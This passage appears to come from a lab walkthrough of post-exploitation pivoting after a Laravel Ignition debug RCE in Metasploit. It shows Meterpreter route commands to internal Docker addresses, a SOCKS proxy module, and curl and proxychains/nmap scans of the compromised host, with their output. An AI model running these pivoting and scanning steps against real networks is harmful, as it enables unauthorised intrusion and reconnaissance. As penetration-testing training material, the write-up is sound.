## Command Routing the Service ``` # The discovered webserice_database IP will be routed to through the Meterpreter session msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.28.101.51/32 -1 [*] Route added ``` - website_databse ---> This is from the .env variable in the docker file () Routing Machine ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > route add 172.17.0.1/32 -1 [*] Route added ``` Check the routing settings ``` msf6 exploit(multi/php/ignition_laravel_debug_rce) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.17.0.1 255.255.255.255 Session 3 172.28.101.51 255.255.255.255 Session 3 [*] There are currently no IPv6 routes defined. ``` Setup Sock Proxy ``` msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 1. [*] Starting the SOCKS proxy server ``` Using the target machine ``` # From the attacker’s host machine, we can use curl with the internal Docker IP to show that the web application is running, and the socks proxy works $ curl --proxy socks4a://localhost:9050 http://172.17.0.1 -v … etc … # From the attacker’s host machine, we can use ProxyChains to scan the compromised host machine for common ports $ proxychains -q nmap -n -sT -Pn -p 22,80,443,5432 172.17.0.1 Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 08:48 EDT Nmap scan report for 172.17.0.1 Host is up (0.069s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp closed https 5432/tcp closed postgresql Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds ```